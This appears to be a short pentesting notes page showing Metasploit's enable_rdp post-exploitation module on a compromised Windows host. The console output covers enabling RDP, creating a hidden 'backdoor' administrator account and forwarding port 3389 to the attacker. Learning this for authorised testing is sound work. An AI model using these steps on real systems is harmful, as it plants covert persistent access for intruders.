Hugo Perinazzo

metasploit rdp

Aug 10, 20242 min read

require elevated shell

You could use the module post/windows/manage/enable_rdp to automatically enable RDP on the victim computer, additionally this module allow you to use the following features:

  • forward victim port 3389 on the attacker machine
  • create a new user who belongs to groups Remote Desktop User Groups and NT AUTHORITY\SYSTEM

Example

msf6 > use post/windows/manage/enable_rdp
 
msf6 post(windows/manage/enable_rdp) > show options
 
Module options (post/windows/manage/enable_rdp):
 
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   ENABLE    true             no        Enable the RDP Service and Firewall Exception.
   FORWARD   true             no        Forward remote port 3389 to local Port.
   LPORT     3389             no        Local port to forward remote connection.
   PASSWORD  backdoor         no        Password for the user created.
   SESSION   70               yes       The session to run this module on
   USERNAME  backdoor         no        The username of the user to create.
 
 
View the full module info with the info, or info -d command.
 
msf6 post(windows/manage/enable_rdp) > exploit
 
[*] Enabling Remote Desktop
[*]     RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*]     The Terminal Services service is not set to auto, changing it to auto ...
[+]     RDP Service Started
[*]     Opening port in local firewall if necessary
[*] Setting user account for logon
[*]     Adding User: backdoor with Password: backdoor
[*]     Adding User: backdoor to local group 'Remote Desktop Users'
[*]     Hiding user from Windows Login screen
[*]     Adding User: backdoor to local group 'Administrators'
[*] You can now login with the created user
[*] Starting the port forwarding at local port 3389
[*] Forward TCP relay created: (local) 0.0.0.0:3389 -> (remote) 127.0.0.1:3389
[*] For cleanup execute Meterpreter resource file: /home/talion/.msf4/loot/20230127183750_default_192.168.0.12_host.windows.cle_596732.txt
[*] Post module execution completed

In this example I created a new backdoor user with password backdoor, he belong to Remote Desktop User Group and NT AUTHORITY\SYSTEM. And I forwarded the port 3389 to my attacker machine, now I can use the creds backdoor:backdoor to connect to 127.0.0.1:3389 using a RDP client like xfreerdp or remmina. But the victim will be prompted that he will be disconnected after 30sec because somebody else try to connect

Then I have access to the target desktop !

Graph View

Backlinks